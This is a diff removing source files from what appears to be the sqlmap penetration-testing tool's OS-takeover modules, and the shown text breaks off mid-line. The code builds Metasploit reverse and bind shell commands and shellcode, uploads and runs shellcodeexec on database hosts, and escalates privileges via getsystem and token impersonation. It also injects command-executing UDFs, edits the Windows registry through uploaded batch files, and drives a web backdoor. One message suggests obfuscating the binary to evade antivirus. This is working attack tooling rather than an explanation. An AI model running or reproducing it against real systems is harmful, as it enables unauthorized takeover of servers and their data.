- elif choice == "3": - _payloadStr = "windows/shell" - - break - - elif choice == "1": - if Backend.isDbms(DBMS.PGSQL): - logger.warn("beware that the VNC injection might not work") - - break - - elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): - break - - elif not choice.isdigit(): - logger.warn("invalid value, only digits are allowed") - - elif int(choice) < 1 or int(choice) > 2: - logger.warn("invalid value, it must be 1 or 2") - - if self.connectionStr.startswith("reverse_http") and _payloadStr != "windows/meterpreter": - warnMsg = "Reverse HTTP%s connection is only supported " % ("S" if self.connectionStr.endswith("s") else "") - warnMsg += "with the Meterpreter payload. Falling back to " - warnMsg += "reverse TCP" - logger.warn(warnMsg) - - self.connectionStr = "reverse_tcp" - - return _payloadStr - - def _selectPort(self): - for connType, connStr in self._portData.items(): - if self.connectionStr.startswith(connType): - return self._skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535)) - - def _selectRhost(self): - if self.connectionStr.startswith("bind"): - message = "what is the back-end DBMS address? [Enter for '%s' (detected)] " % self.remoteIP - address = readInput(message, default=self.remoteIP) - - if not address: - address = self.remoteIP - - return address - - elif self.connectionStr.startswith("reverse"): - return None - - else: - raise SqlmapDataException("unexpected connection type") - - def _selectLhost(self): - if self.connectionStr.startswith("reverse"): - message = "what is the local address? [Enter for '%s' (detected)] " % self.localIP - address = readInput(message, default=self.localIP) - - if not address: - address = self.localIP - - return address - - elif self.connectionStr.startswith("bind"): - return None - - else: - raise SqlmapDataException("unexpected connection type") - - def _selectConnection(self): - return self._skeletonSelection("connection type", self._msfConnectionsList) - - def _prepareIngredients(self, encode=True): - self.connectionStr = self._selectConnection() - self.lhostStr = self._selectLhost() - self.rhostStr = self._selectRhost() - self.portStr = self._selectPort() - self.payloadStr = self._selectPayload() - self.encoderStr = self._selectEncoder(encode) - self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr) - - def _forgeMsfCliCmd(self, exitfunc="process"): - if kb.oldMsf: - self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) - self._cliCmd += " EXITFUNC=%s" % exitfunc - self._cliCmd += " LPORT=%s" % self.portStr - - if self.connectionStr.startswith("bind"): - self._cliCmd += " RHOST=%s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += " LHOST=%s" % self.lhostStr - else: - raise SqlmapDataException("unexpected connection type") - - if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": - self._cliCmd += " DisableCourtesyShell=true" - - self._cliCmd += " E" - else: - self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) - self._cliCmd += "; set EXITFUNC %s" % exitfunc - self._cliCmd += "; set LPORT %s" % self.portStr - - if self.connectionStr.startswith("bind"): - self._cliCmd += "; set RHOST %s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += "; set LHOST %s" % self.lhostStr - else: - raise SqlmapDataException("unexpected connection type") - - if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": - self._cliCmd += "; set DisableCourtesyShell true" - - self._cliCmd += "; exploit'" - - def _forgeMsfCliCmdForSmbrelay(self): - self._prepareIngredients(encode=False) - - if kb.oldMsf: - self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) - self._cliCmd += " EXITFUNC=thread" - self._cliCmd += " LPORT=%s" % self.portStr - self._cliCmd += " SRVHOST=%s" % self.lhostStr - self._cliCmd += " SRVPORT=%s" % self._selectSMBPort() - - if self.connectionStr.startswith("bind"): - self._cliCmd += " RHOST=%s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += " LHOST=%s" % self.lhostStr - else: - raise SqlmapDataException("unexpected connection type") - - self._cliCmd += " E" - else: - self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) - self._cliCmd += "; set EXITFUNC thread" - self._cliCmd += "; set LPORT %s" % self.portStr - self._cliCmd += "; set SRVHOST %s" % self.lhostStr - self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort() - - if self.connectionStr.startswith("bind"): - self._cliCmd += "; set RHOST %s" % self.rhostStr - elif self.connectionStr.startswith("reverse"): - self._cliCmd += "; set LHOST %s" % self.lhostStr - else: - raise SqlmapDataException("unexpected connection type") - - self._cliCmd += "; exploit'" - - def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None): - if kb.oldMsf: - self._payloadCmd = self._msfPayload - else: - self._payloadCmd = "%s -p" % self._msfVenom - - self._payloadCmd += " %s" % self.payloadConnStr - self._payloadCmd += " EXITFUNC=%s" % exitfunc - self._payloadCmd += " LPORT=%s" % self.portStr - - if self.connectionStr.startswith("reverse"): - self._payloadCmd += " LHOST=%s" % self.lhostStr - elif not self.connectionStr.startswith("bind"): - raise SqlmapDataException("unexpected connection type") - - if Backend.isOs(OS.LINUX) and conf.privEsc: - self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true" - - if kb.oldMsf: - if extra == "BufferRegister=EAX": - self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format) - - if extra is not None: - self._payloadCmd += " %s" % extra - else: - self._payloadCmd += " X > \"%s\"" % outFile - else: - if extra == "BufferRegister=EAX": - self._payloadCmd += " -a x86 -e %s -f %s > \"%s\"" % (self.encoderStr, format, outFile) - - if extra is not None: - self._payloadCmd += " %s" % extra - else: - self._payloadCmd += " -f exe > \"%s\"" % outFile - - def _runMsfCliSmbrelay(self): - self._forgeMsfCliCmdForSmbrelay() - - infoMsg = "running Metasploit Framework command line " - infoMsg += "interface locally, please wait.." - logger.info(infoMsg) - - logger.debug("executing local command: %s" % self._cliCmd) - self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) - - def _runMsfCli(self, exitfunc): - self._forgeMsfCliCmd(exitfunc) - - infoMsg = "running Metasploit Framework command line " - infoMsg += "interface locally, please wait.." - logger.info(infoMsg) - - logger.debug("executing local command: %s" % self._cliCmd) - self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) - - def _runMsfShellcodeRemote(self): - infoMsg = "running Metasploit Framework shellcode " - infoMsg += "remotely via UDF 'sys_bineval', please wait.." - logger.info(infoMsg) - - self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval") - - def _runMsfShellcodeRemoteViaSexec(self): - infoMsg = "running Metasploit Framework shellcode remotely " - infoMsg += "via shellcodeexec, please wait.." - logger.info(infoMsg) - - if not Backend.isOs(OS.WINDOWS): - self.execCmd("chmod +x %s" % self.shellcodeexecRemote, silent=True) - cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString) - else: - cmd = "\"%s\" %s" % (self.shellcodeexecRemote, self.shellcodeString) - - self.execCmd(cmd, silent=True) - - def _loadMetExtensions(self, proc, metSess): - if not Backend.isOs(OS.WINDOWS): - return - - send_all(proc, "use espia\n") - send_all(proc, "use incognito\n") - # This extension is loaded by default since Metasploit > 3.7 - #send_all(proc, "use priv\n") - # This extension freezes the connection on 64-bit systems - #send_all(proc, "use sniffer\n") - send_all(proc, "sysinfo\n") - send_all(proc, "getuid\n") - - if conf.privEsc: - print - - infoMsg = "trying to escalate privileges using Meterpreter " - infoMsg += "'getsystem' command which tries different " - infoMsg += "techniques, including kitrap0d" - logger.info(infoMsg) - - send_all(proc, "getsystem\n") - - infoMsg = "displaying the list of Access Tokens availables. " - infoMsg += "Choose which user you want to impersonate by " - infoMsg += "using incognito's command 'impersonate_token' if " - infoMsg += "'getsystem' does not success to elevate privileges" - logger.info(infoMsg) - - send_all(proc, "list_tokens -u\n") - send_all(proc, "getuid\n") - - def _controlMsfCmd(self, proc, func): - initialized = False - start_time = time.time() - stdin_fd = sys.stdin.fileno() - - while True: - returncode = proc.poll() - - if returncode is None: - # Child hasn't exited yet - pass - else: - logger.debug("connection closed properly") - return returncode - - try: - if IS_WIN: - timeout = 3 - - inp = "" - _ = time.time() - - while True: - if msvcrt.kbhit(): - char = msvcrt.getche() - - if ord(char) == 13: # enter_key - break - elif ord(char) >= 32: # space_char - inp += char - - if len(inp) == 0 and (time.time() - _) > timeout: - break - - if len(inp) > 0: - try: - send_all(proc, inp) - except (EOFError, IOError): - # Probably the child has exited - pass - else: - ready_fds = select([stdin_fd], [], [], 1) - - if stdin_fd in ready_fds[0]: - try: - send_all(proc, blockingReadFromFD(stdin_fd)) - except (EOFError, IOError): - # Probably the child has exited - pass - - out = recv_some(proc, t=.1, e=0) - blockingWriteToFD(sys.stdout.fileno(), out) - - # For --os-pwn and --os-bof - pwnBofCond = self.connectionStr.startswith("reverse") - pwnBofCond &= "Starting the payload handler" in out - - # For --os-smbrelay - smbRelayCond = "Server started" in out - - if pwnBofCond or smbRelayCond: - func() - - timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT - - if not initialized: - match = re.search("Meterpreter session ([\d]+) opened", out) - - if match: - self._loadMetExtensions(proc, match.group(1)) - - if "shell" in self.payloadStr: - send_all(proc, "whoami\n" if Backend.isOs(OS.WINDOWS) else "uname -a ; id\n") - time.sleep(2) - - initialized = True - elif timeout: - proc.kill() - errMsg = "timeout occurred while attempting " - errMsg += "to open a remote session" - raise SqlmapGenericException(errMsg) - - if conf.liveTest and timeout: - if initialized: - send_all(proc, "exit\n") - time.sleep(2) - else: - proc.kill() - - except (EOFError, IOError): - return proc.returncode - - def createMsfShellcode(self, exitfunc, format, extra, encode): - infoMsg = "creating Metasploit Framework multi-stage shellcode " - logger.info(infoMsg) - - self._randStr = randomStr(lowercase=True) - self._shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self._randStr) - - Metasploit._initVars(self) - self._prepareIngredients(encode=encode) - self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra) - - logger.debug("executing local command: %s" % self._payloadCmd) - process = execute(self._payloadCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) - - dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X")) - pollProcess(process) - payloadStderr = process.communicate()[1] - - match = re.search("(Total size:|Length:|succeeded with size) ([\d]+)", payloadStderr) - - if match: - payloadSize = int(match.group(2)) - - if extra == "BufferRegister=EAX": - payloadSize = payloadSize / 2 - - debugMsg = "the shellcode size is %d bytes" % payloadSize - logger.debug(debugMsg) - else: - errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "") - raise SqlmapFilePathException(errMsg) - - self._shellcodeFP = open(self._shellcodeFilePath, "rb") - self.shellcodeString = self._shellcodeFP.read() - self._shellcodeFP.close() - - os.unlink(self._shellcodeFilePath) - - def uploadShellcodeexec(self, web=False): - self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec") - - if Backend.isOs(OS.WINDOWS): - self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32") - content = decloak(self.shellcodeexecLocal) - if SHELLCODEEXEC_RANDOM_STRING_MARKER in content: - content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER))) - _ = cloak(data=content) - handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32") - os.close(handle) - with open(self.shellcodeexecLocal, "w+b") as f: - f.write(_) - else: - self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch()) - - __basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "") - - self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename) - self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote)) - - logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote) - - if web: - written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal) - else: - written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True) - - if written is not True: - errMsg = "there has been a problem uploading shellcodeexec, it " - errMsg += "looks like the binary file has not been written " - errMsg += "on the database underlying file system or an AV has " - errMsg += "flagged it as malicious and removed it. In such a case " - errMsg += "it is recommended to recompile shellcodeexec with " - errMsg += "slight modification to the source code or pack it " - errMsg += "with an obfuscator software" - logger.error(errMsg) - - return False - else: - logger.info("shellcodeexec successfully uploaded") - return True - - def pwn(self, goUdf=False): - if goUdf: - exitfunc = "thread" - func = self._runMsfShellcodeRemote - else: - exitfunc = "process" - func = self._runMsfShellcodeRemoteViaSexec - - self._runMsfCli(exitfunc=exitfunc) - - if self.connectionStr.startswith("bind"): - func() - - debugMsg = "Metasploit Framework command line interface exited " - debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, func) - logger.debug(debugMsg) - - if not goUdf: - time.sleep(1) - self.delRemoteFile(self.shellcodeexecRemote) - - def smb(self): - Metasploit._initVars(self) - self._randFile = "tmpu%s.txt" % randomStr(lowercase=True) - - self._runMsfCliSmbrelay() - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self._randFile) - else: - self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self._randFile) - - debugMsg = "Metasploit Framework console exited with return " - debugMsg += "code %s" % self._controlMsfCmd(self._msfCliProc, self.uncPathRequest) - logger.debug(debugMsg) - - def bof(self): - self._runMsfCli(exitfunc="seh") - - if self.connectionStr.startswith("bind"): - self.spHeapOverflow() - - debugMsg = "Metasploit Framework command line interface exited " - debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow) - logger.debug(debugMsg) diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py deleted file mode 100644 index 904ca730..00000000 --- a/lib/takeover/registry.py +++ /dev/null @@ -1,117 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.common import randomStr -from lib.core.data import conf -from lib.core.data import logger -from lib.core.enums import REGISTRY_OPERATION - -class Registry: - """ - This class defines methods to read and write Windows registry keys - """ - - def _initVars(self, regKey, regValue, regType=None, regData=None, parse=False): - self._regKey = regKey - self._regValue = regValue - self._regType = regType - self._regData = regData - - self._randStr = randomStr(lowercase=True) - self._batPathRemote = "%s/tmpr%s.bat" % (conf.tmpPath, self._randStr) - self._batPathLocal = os.path.join(conf.outputPath, "tmpr%s.bat" % self._randStr) - - if parse: - readParse = "FOR /F \"tokens=*\" %%A IN ('REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"') DO SET value=%%A\r\nECHO %value%\r\n" - else: - readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"" - - self._batRead = ( - "@ECHO OFF\r\n", - readParse, - ) - - self._batAdd = ( - "@ECHO OFF\r\n", - "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData), - ) - - self._batDel = ( - "@ECHO OFF\r\n", - "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue), - ) - - def _createLocalBatchFile(self): - self._batPathFp = open(self._batPathLocal, "w") - - if self._operation == REGISTRY_OPERATION.READ: - lines = self._batRead - elif self._operation == REGISTRY_OPERATION.ADD: - lines = self._batAdd - elif self._operation == REGISTRY_OPERATION.DELETE: - lines = self._batDel - - for line in lines: - self._batPathFp.write(line) - - self._batPathFp.close() - - def _createRemoteBatchFile(self): - logger.debug("creating batch file '%s'" % self._batPathRemote) - - self._createLocalBatchFile() - self.writeFile(self._batPathLocal, self._batPathRemote, "text", forceCheck=True) - - os.unlink(self._batPathLocal) - - def readRegKey(self, regKey, regValue, parse=False): - self._operation = REGISTRY_OPERATION.READ - - Registry._initVars(self, regKey, regValue, parse=parse) - self._createRemoteBatchFile() - - logger.debug("reading registry key '%s' value '%s'" % (regKey, regValue)) - - data = self.evalCmd(self._batPathRemote) - - if data and not parse: - pattern = ' ' - index = data.find(pattern) - if index != -1: - data = data[index + len(pattern):] - - self.delRemoteFile(self._batPathRemote) - - return data - - def addRegKey(self, regKey, regValue, regType, regData): - self._operation = REGISTRY_OPERATION.ADD - - Registry._initVars(self, regKey, regValue, regType, regData) - self._createRemoteBatchFile() - - debugMsg = "adding registry key value '%s' " % self._regValue - debugMsg += "to registry key '%s'" % self._regKey - logger.debug(debugMsg) - - self.execCmd(cmd=self._batPathRemote) - self.delRemoteFile(self._batPathRemote) - - def delRegKey(self, regKey, regValue): - self._operation = REGISTRY_OPERATION.DELETE - - Registry._initVars(self, regKey, regValue) - self._createRemoteBatchFile() - - debugMsg = "deleting registry key value '%s' " % self._regValue - debugMsg += "from registry key '%s'" % self._regKey - logger.debug(debugMsg) - - self.execCmd(cmd=self._batPathRemote) - self.delRemoteFile(self._batPathRemote) diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py deleted file mode 100644 index 13c0c9de..00000000 --- a/lib/takeover/udf.py +++ /dev/null @@ -1,411 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os - -from lib.core.agent import agent -from lib.core.common import checkFile -from lib.core.common import dataToStdout -from lib.core.common import Backend -from lib.core.common import isStackingAvailable -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import logger -from lib.core.data import queries -from lib.core.enums import DBMS -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import EXPECTED -from lib.core.enums import OS -from lib.core.common import unArrayizeValue -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.core.exception import SqlmapUserQuitException -from lib.core.unescaper import unescaper -from lib.request import inject - -class UDF: - """ - This class defines methods to deal with User-Defined Functions for - plugins. - """ - - def __init__(self): - self.createdUdf = set() - self.udfs = {} - self.udfToCreate = set() - - def _askOverwriteUdf(self, udf): - message = "UDF '%s' already exists, do you " % udf - message += "want to overwrite it? [y/N] " - output = readInput(message, default="N") - - if output and output[0] in ("y", "Y"): - return True - else: - return False - - def _checkExistUdf(self, udf): - logger.info("checking if UDF '%s' already exist" % udf) - - query = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf)) - return inject.getValue(query, resumeValue=False, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY) - - def udfCheckAndOverwrite(self, udf): - exists = self._checkExistUdf(udf) - overwrite = True - - if exists: - overwrite = self._askOverwriteUdf(udf) - - if overwrite: - self.udfToCreate.add(udf) - - def udfCreateSupportTbl(self, dataType): - debugMsg = "creating a support table for user-defined functions" - logger.debug(debugMsg) - - self.createSupportTbl(self.cmdTblName, self.tblField, dataType) - - def udfForgeCmd(self, cmd): - if not cmd.startswith("'"): - cmd = "'%s" % cmd - - if not cmd.endswith("'"): - cmd = "%s'" % cmd - - return cmd - - def udfExecCmd(self, cmd, silent=False, udfName=None): - if udfName is None: - udfName = "sys_exec" - - cmd = unescaper.escape(self.udfForgeCmd(cmd)) - - return inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent) - - def udfEvalCmd(self, cmd, first=None, last=None, udfName=None): - if udfName is None: - udfName = "sys_eval" - - if conf.direct: - output = self.udfExecCmd(cmd, udfName=udfName) - - if output and isinstance(output, (list, tuple)): - new_output = "" - - for line in output: - new_output += line.replace("\r", "\n") - - output = new_output - else: - cmd = unescaper.escape(self.udfForgeCmd(cmd)) - - inject.goStacked("INSERT INTO %s(%s) VALUES (%s(%s))" % (self.cmdTblName, self.tblField, udfName, cmd)) - output = unArrayizeValue(inject.getValue("SELECT %s FROM %s" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False)) - inject.goStacked("DELETE FROM %s" % self.cmdTblName) - - return output - - def udfCheckNeeded(self): - if (not conf.rFile or (conf.rFile and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: - self.sysUdfs.pop("sys_fileread") - - if not conf.osPwn: - self.sysUdfs.pop("sys_bineval") - - if not conf.osCmd and not conf.osShell and not conf.regRead: - self.sysUdfs.pop("sys_eval") - - if not conf.osPwn and not conf.regAdd and not conf.regDel: - self.sysUdfs.pop("sys_exec") - - def udfSetRemotePath(self): - errMsg = "udfSetRemotePath() method must be defined within the plugin" - raise SqlmapUnsupportedFeatureException(errMsg) - - def udfSetLocalPaths(self): - errMsg = "udfSetLocalPaths() method must be defined within the plugin" - raise SqlmapUnsupportedFeatureException(errMsg) - - def udfCreateFromSharedLib(self, udf=None, inpRet=None): - errMsg = "udfCreateFromSharedLib() method must be defined within the plugin" - raise SqlmapUnsupportedFeatureException(errMsg) - - def udfInjectCore(self, udfDict): - written = False - - for udf in udfDict.keys(): - if udf in self.createdUdf: - continue - - self.udfCheckAndOverwrite(udf) - - if len(self.udfToCreate) > 0: - self.udfSetRemotePath() - checkFile(self.udfLocalFile) - written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True) - - if written is not True: - errMsg = "there has been a problem uploading the shared library, " - errMsg += "it looks like the binary file has not been written " - errMsg += "on the database underlying file system" - logger.error(errMsg) - - message = "do you want to proceed anyway? Beware that the " - message += "operating system takeover will fail [y/N] " - choice = readInput(message, default="N") - - if choice and choice.lower() == "y": - written = True - else: - return False - else: - return True - - for udf, inpRet in udfDict.items(): - if udf in self.udfToCreate and udf not in self.createdUdf: - self.udfCreateFromSharedLib(udf, inpRet) - - if Backend.isDbms(DBMS.MYSQL): - supportTblType = "longtext" - elif Backend.isDbms(DBMS.PGSQL): - supportTblType = "text" - - self.udfCreateSupportTbl(supportTblType) - - return written - - def udfInjectSys(self): - self.udfSetLocalPaths() - self.udfCheckNeeded() - return self.udfInjectCore(self.sysUdfs) - - def udfInjectCustom(self): - if Backend.getIdentifiedDbms() not in (DBMS.MYSQL, DBMS.PGSQL): - errMsg = "UDF injection feature only works on MySQL and PostgreSQL" - logger.error(errMsg) - return - - if not isStackingAvailable() and not conf.direct: - errMsg = "UDF injection feature requires stacked queries SQL injection" - logger.error(errMsg) - return - - self.checkDbmsOs() - - if not self.isDba(): - warnMsg = "functionality requested probably does not work because " - warnMsg += "the curent session user is not a database administrator" - logger.warn(warnMsg) - - if not conf.shLib: - msg = "what is the local path of the shared library? " - - while True: - self.udfLocalFile = readInput(msg) - - if self.udfLocalFile: - break - else: - logger.warn("you need to specify the local path of the shared library") - else: - self.udfLocalFile = conf.shLib - - if not os.path.exists(self.udfLocalFile): - errMsg = "the specified shared library file does not exist" - raise SqlmapFilePathException(errMsg) - - if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"): - errMsg = "shared library file must end with '.dll' or '.so'" - raise SqlmapMissingMandatoryOptionException(errMsg) - - elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS): - errMsg = "you provided a shared object as shared library, but " - errMsg += "the database underlying operating system is Windows" - raise SqlmapMissingMandatoryOptionException(errMsg) - - elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX): - errMsg = "you provided a dynamic-link library as shared library, " - errMsg += "but the database underlying operating system is Linux" - raise SqlmapMissingMandatoryOptionException(errMsg) - - self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0] - self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1] - - msg = "how many user-defined functions do you want to create " - msg += "from the shared library? " - - while True: - udfCount = readInput(msg, default=1) - - if isinstance(udfCount, basestring) and udfCount.isdigit(): - udfCount = int(udfCount) - - if udfCount <= 0: - logger.info("nothing to inject then") - return - else: - break - - elif isinstance(udfCount, int): - break - - else: - logger.warn("invalid value, only digits are allowed") - - for x in xrange(0, udfCount): - while True: - msg = "what is the name of the UDF number %d? " % (x + 1) - udfName = readInput(msg) - - if udfName: - self.udfs[udfName] = {} - break - else: - logger.warn("you need to specify the name of the UDF") - - if Backend.isDbms(DBMS.MYSQL): - defaultType = "string" - elif Backend.isDbms(DBMS.PGSQL): - defaultType = "text" - - self.udfs[udfName]["input"] = [] - - default = 1 - msg = "how many input parameters takes UDF " - msg += "'%s'? (default: %d) " % (udfName, default) - - while True: - parCount = readInput(msg, default=default) - - if isinstance(parCount, basestring) and parCount.isdigit() and int(parCount) >= 0: - parCount = int(parCount) - break - - elif isinstance(parCount, int): - break - - else: - logger.warn("invalid value, only digits >= 0 are allowed") - - for y in xrange(0, parCount): - msg = "what is the data-type of input parameter " - msg += "number %d? (default: %s) " % ((y + 1), defaultType) - - while True: - parType = readInput(msg, default=defaultType) - - if isinstance(parType, basestring) and parType.isdigit(): - logger.warn("you need to specify the data-type of the parameter") - - else: - self.udfs[udfName]["input"].append(parType) - break - - msg = "what is the data-type of the return " - msg += "value? (default: %s) " % defaultType - - while True: - retType = readInput(msg, default=defaultType) - - if isinstance(retType, basestring) and retType.isdigit(): - logger.warn("you need to specify the data-type of the return value") - else: - self.udfs[udfName]["return"] = retType - break - - success = self.udfInjectCore(self.udfs) - - if success is False: - self.cleanup(udfDict=self.udfs) - return False - - msg = "do you want to call your injected user-defined " - msg += "functions now? [Y/n/q] " - choice = readInput(msg, default="Y") - - if choice[0] in ("n", "N"): - self.cleanup(udfDict=self.udfs) - return - elif choice[0] in ("q", "Q"): - self.cleanup(udfDict=self.udfs) - raise SqlmapUserQuitException - - while True: - udfList = [] - msg = "which UDF do you want to call?" - - for udf in self.udfs.keys(): - udfList.append(udf) - msg += "\n[%d] %s" % (len(udfList), udf) - - msg += "\n[q] Quit" - - while True: - choice = readInput(msg) - - if choice and choice[0] in ("q", "Q"): - break - elif isinstance(choice, basestring) and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList): - choice = int(choice) - break - elif isinstance(choice, int) and choice > 0 and choice <= len(udfList): - break - else: - warnMsg = "invalid value, only digits >= 1 and " - warnMsg += "<= %d are allowed" % len(udfList) - logger.warn(warnMsg) - - if not isinstance(choice, int): - break - - cmd = "" - count = 1 - udfToCall = udfList[choice - 1] - - for inp in self.udfs[udfToCall]["input"]: - msg = "what is the value of the parameter number " - msg += "%d (data-type: %s)? " % (count, inp) - - while True: - parValue = readInput(msg) - - if parValue: - if "int" not in inp and "bool" not in inp: - parValue = "'%s'" % parValue - - cmd += "%s," % parValue - - break - else: - logger.warn("you need to specify the value of the parameter") - - count += 1 - - cmd = cmd[:-1] - msg = "do you want to retrieve the return value of the " - msg += "UDF? [Y/n] " - choice = readInput(msg, default="Y") - - if choice[0] in ("y", "Y"): - output = self.udfEvalCmd(cmd, udfName=udfToCall) - - if output: - conf.dumper.string("return value", output) - else: - dataToStdout("No return value\n") - else: - self.udfExecCmd(cmd, udfName=udfToCall, silent=True) - - msg = "do you want to call this or another injected UDF? [Y/n] " - choice = readInput(msg, default="Y") - - if choice[0] not in ("y", "Y"): - break - - self.cleanup(udfDict=self.udfs) diff --git a/lib/takeover/web.py b/lib/takeover/web.py deleted file mode 100644 index 8fe7757d..00000000 --- a/lib/takeover/web.py +++ /dev/null @@ -1,358 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import posixpath -import re -import StringIO -import tempfile -import urlparse - -from extra.cloak.cloak import decloak -from lib.core.agent import agent -from lib.core.common import arrayizeValue -from lib.core.common import Backend -from lib.core.common import extractRegexResult -from lib.core.common import getAutoDirectories -from lib.core.common import getManualDirectories -from lib.core.common import getPublicTypeMembers -from lib.core.common import getSQLSnippet -from lib.core.common import getUnicode -from lib.core.common import ntToPosixSlashes -from lib.core.common import isTechniqueAvailable -from lib.core.common import isWindowsDriveLetterPath -from lib.core.common import normalizePath -from lib.core.common import posixToNtSlashes -from lib.core.common import randomInt -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import singleTimeWarnMessage -from lib.core.convert import hexencode -from lib.core.convert import utf8encode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.enums import PAYLOAD -from lib.core.enums import WEB_API -from lib.core.exception import SqlmapNoneDataException -from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT -from lib.core.settings import EVENTVALIDATION_REGEX -from lib.core.settings import VIEWSTATE_REGEX -from lib.request.connect import Connect as Request -from thirdparty.oset.pyoset import oset - - -class Web: - """ - This class defines web-oriented OS takeover functionalities for - plugins. - """ - - def __init__(self): - self.webApi = None - self.webBaseUrl = None - self.webBackdoorUrl = None - self.webBackdoorFilePath = None - self.webStagerUrl = None - self.webStagerFilePath = None - self.webDirectory = None - - def webBackdoorRunCmd(self, cmd): - if self.webBackdoorUrl is None: - return - - output = None - - if not cmd: - cmd = conf.osCmd - - cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd) - page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT) - - if page is not None: - output = re.search("
    (.+?)
